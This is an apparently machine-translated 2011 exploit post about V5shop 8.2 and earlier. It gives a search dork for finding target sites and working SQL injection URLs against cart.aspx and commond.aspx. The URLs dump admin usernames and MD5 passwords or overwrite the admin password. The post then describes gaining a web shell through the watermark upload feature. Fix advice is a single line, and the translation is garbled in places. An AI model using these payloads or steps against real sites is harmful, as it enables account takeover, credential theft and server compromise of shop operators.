V5shop injection vulnerability-vulnerability warning-the black bar safety net

2011-08-22T00:00:00
ID MYHACK58:62201131649
Type myhack58
Reporter 佚名
Modified 2011-08-22T00:00:00

Description

Vulnerability to harm: the high-risk A vulnerability file: cart. aspx

Search keywords: inurl:scoreindex. aspx

exp: the

/cart. aspx? act=buy&id=1 and (Select Top 1 char(1 2 4)%2BisNull(cast([Name] as varchar(8 0 0 0)),char(3 2))%2Bchar(1 2 4)%2BisNull(cast([Pass] as varchar(8 0 0 0)),char(3 2))%2Bchar(1 2 4) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

Operating results as shown in Figure(red circle part is the user and md5 password) to:

Then for the burst of md5 password online decrypt, and if successful, you can login the backend, the default address:/weblogin, enter the above username and password both can be successful into the background. Of course, many times md5 decrypt is not the result of the need to update the administrator password:

update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

Wherein the pass string before the password is converted into 3 2-bit, then converted to uppercase, and then converted into sql16 into the above string the default password is v5shop)

The full statement is:

cart. aspx? act=buy&id=1 and (update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100 )>0 --

If successful, you can login the backend, the default address:/weblogin, enter the above username and password both can be successful into the background.

Into the background after the system settings-parameter settings-background uploading watermark,watermark uploads there, looks like you can upload arbitrary files(can upload asp Malaysia, and then upload the aspx in Malaysia) of.

Summary: This basic method can be done 8. 2 Version and the following version of the pass to kill, the latest version of 8. 3 has resolved the vulnerability.

Fix: upgrade to the latest 8. 3 Edition, or temporary put the cart. aspx rename or do other processing method.

Second, the vulnerability file: commond. aspx

exp:

/commond. aspx? id=1 and 1=(select top 1 [name] from web_admin) This can be displayed directly out of the admin username

/commond. aspx? id=1 and 1=(select top 1 [pass] from web_admin) Above this you can display the MD5 password

/commond. aspx? id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

Above this is used to change the administrator password

If successful, the admin password has been changed you specify a password here, the default for v5shop, and then you can login the backend, the default address:/weblogin, enter the above username and password both can be successful into the background.

Take the shell method: (not verified) System settings->parameter settings->background upload watermark. The first pass of the ASP of the horse..then spread ASPX. Upload the posterior path:/uploadFile/Picture/*. asp

Summary: This basic method can be done 8. 2 Version and the following version of the pass to kill, the latest version of 8. 3 has resolved the vulnerability.

Fix: upgrade to the latest 8. 3 Edition, or temporary put the commond. aspx rename or do other processing method.

Tip: use the system can timely upgrade, read this message, please everyone only for learning, not for illegal purposes.

cart. aspx? act=buy&id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100--